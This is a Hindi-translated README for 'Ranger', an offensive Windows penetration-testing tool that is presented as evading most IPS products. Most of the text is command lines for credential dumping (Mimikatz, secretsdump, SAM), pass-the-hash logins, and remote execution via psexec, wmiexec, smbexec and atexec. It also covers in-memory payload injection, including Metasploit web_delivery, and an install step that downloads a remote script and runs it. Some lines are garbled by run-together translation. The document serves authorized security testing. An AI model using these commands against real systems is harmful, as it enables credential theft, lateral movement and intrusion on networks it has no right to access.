
सुरक्षा पेशेवरों के लिए एक उपकरण जो रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुँचने और उनके साथ बातचीत करने के लिए है।
सुरक्षा पेशेवरों को रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुंचने और उनके साथ बातचीत करने में सहायता करने के लिए एक उपकरण।
यह परियोजना इस सोच के साथ बनाई गई थी, हमने धनुष या तीर का आविष्कार नहीं किया, बल्कि इसका उपयोग करने का एक अधिक कुशल तरीका बनाया।
Ranger एक कमांड-लाइन संचालित हमले और पैठ परीक्षण उपकरण है, जिसमें विंडोज सिस्टम के खिलाफ क्षमताओं को वितरित करने के लिए एक तत्काल कैटपल्ट सर्वर का उपयोग करने की क्षमता है। जब तक किसी उपयोगकर्ता के पास क्रेडेंशियल्स या हैश सेट (NTLM, LM, LM:NTLM) होता है, वह उन सिस्टमों तक पहुंच प्राप्त कर सकता है जो ट्रस्ट का हिस्सा हैं।
इस क्षमता का उपयोग करके एक सुरक्षा पेशेवर मेमोरी से क्लियर-टेक्स्ट में क्रेडेंशियल्स निकाल सकता है, SAM टेबल्स तक पहुंच सकता है, कमांड चला सकता है, PowerShell स्क्रिप्ट, विंडोज बाइनरी, और अन्य उपकरण निष्पादित कर सकता है। इस समय, यह उपकरण अधिकांश IPS विक्रेता समाधानों को बायपास करता है जब तक कि उन्हें विशेष रूप से इसका पता लगाने के लिए ट्यून नहीं किया गया हो। यह उपकरण हमारे होम लैब्स का उपयोग करके विकसित किया गया था, ताकि कानूनी और/या अनुबंधित रूप से समर्थित गतिविधियों को करने वाले सुरक्षा पेशेवरों का समर्थन किया जा सके।
अधिक कार्यक्षमता जोड़ी जा रही है, लेकिन इस समय यह उपकरण PowerShell PowerView, PowerShell Mimikatz और Impacket टीमों से संबंधित रिपॉजिटरी के समुदाय योगदानों का उपयोग करता है।
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
##कमांड निष्पादन: ###लॉग इन उपयोगकर्ता खोजें:
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
###SMBEXEC कमांड शेल:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
###PSEXEC कमांड शेल:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
###PSEXEC कमांड निष्पादन:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
###WMIEXEC कमांड निष्पादन:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
###WMIEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
###WMIEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
###WMIEXEC कस्टम कोड मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
###ATEXEC कमांड निष्पादन:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
###ATEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
###ATEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
###ATEXEC कस्टम कोड मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
###SECRETSDUMP कस्टम कोड मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
###पेस्ट करने योग्य Mimikatz हमला बनाएं:
ranger.py --invoker -q -v -vv -vvv
###पेस्ट करने योग्य web_delivery हमला बनाएं (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):
ranger.py --downloader -q -v -vv -vvv
###पेस्ट करने योग्य Executor हमला बनाएं:
ranger.py --executor -q -v -vv -vvv
--get-domain-membership के साथ वास्तविक क्वेरी डोमेन का निर्धारण करें--domain का उपयोग करें, जो आपको उस डोमेन से अलग डोमेन को लक्षित करने की अनुमति देता है जिसमें आपने लॉगिन किया थाranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
##उपयोग के बारे में नोट्स: ###क्रेड फ़ाइल फ़ॉर्मेट:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
###क्रेडेंशियल फ़ाइल चेतावनियां:
-d के माध्यम से डोमेन नाम प्रदान करते हैं, तो यह अनुमान लगाएगा कि आप फ़ाइल में सभी डोमेन नामों को अनदेखा करना चाहते हैं।###कमांड लाइन निष्पादन:
password
LM:NTLM
:NTLM
PWDUMP
###लक्ष्य और बहिष्करण:
####लक्ष्य, लक्ष्य श्रेणियाँ, लक्ष्य CIDRs, लक्ष्य सूचियाँ, NMAP XML लक्ष्य:
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml####बहिष्करण, बहिष्करण श्रेणियाँ, बहिष्करण CIDRs, बहिष्करण सूचियाँ, Nmap XML बहिष्करण:
t को e से बदलें-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml